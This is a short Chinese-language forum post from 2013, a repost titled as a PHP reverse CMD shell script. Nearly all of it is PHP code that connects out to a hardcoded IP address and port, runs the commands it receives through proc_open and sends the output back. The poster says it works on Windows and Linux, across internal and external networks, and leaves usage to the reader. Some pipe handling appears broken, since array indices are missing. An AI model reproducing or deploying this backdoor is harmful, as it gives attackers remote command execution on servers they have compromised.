Bat 发表于 2013-11-23 17:35:13

php反弹CMD脚本 (转)

<?php
error_reporting (E_ERROR);
ignore_user_abort(true);
ini_set(‘max_execution_time’,0);
$os = substr(PHP_OS,0,3);
$ipaddr = ’174.124.23.5′;
$port = ’7788′;
$descriptorspec = array(0 => array(“pipe”,“r”),1 => array(“pipe”,“w”),2 => array(“pipe”,“w”));
$cwd = getcwd();
$msg = php_uname().“\n————Code by Spider————-\n”;
if($os == ‘WIN’) {
    $env = array(‘path’ => ‘c:\\windows\\system32′);
} else {
    $env = array(‘path’ => ‘/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin’);
}
if(function_exists(‘fsockopen’)) {
    $sock = fsockopen($ipaddr,$port);
    fwrite($sock,$msg);
    while ($cmd = fread($sock,1024)) {
      if (substr($cmd,0,3) == ‘cd ’) {
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
      }
      if (trim(strtolower($cmd)) == ‘exit’) {
            break;
      } else {
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) {
                fwrite($pipes,$cmd);
                fclose($pipes);
                $msg = stream_get_contents($pipes);
                fwrite($sock,$msg);
                fclose($pipes);
                $msg = stream_get_contents($pipes);
                fwrite($sock,$msg);
                fclose($pipes);
                proc_close($process);
            }
      }
    }
    fclose($sock);
} else {
    $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
    socket_connect($sock,$ipaddr,$port);
    socket_write($sock,$msg);
    fwrite($sock,$msg);
    while ($cmd = socket_read($sock,1024)) {
      if (substr($cmd,0,3) == ‘cd ’) {
            $cwd = trim(substr($cmd,3,-1));
            chdir($cwd);
            $cwd = getcwd();
      }
      if (trim(strtolower($cmd)) == ‘exit’) {
            break;
      } else {
            $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
            if (is_resource($process)) {
                fwrite($pipes,$cmd);
                fclose($pipes);
                $msg = stream_get_contents($pipes);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes);
                $msg = stream_get_contents($pipes);
                socket_write($sock,$msg,strlen($msg));
                fclose($pipes);
                proc_close($process);
            }
      }
    }
    socket_close($sock);
}
?>
windows,linux,内外网均可反弹。 使用方法: 相信你懂的.
页: [1]
查看完整版本: php反弹CMD脚本 (转)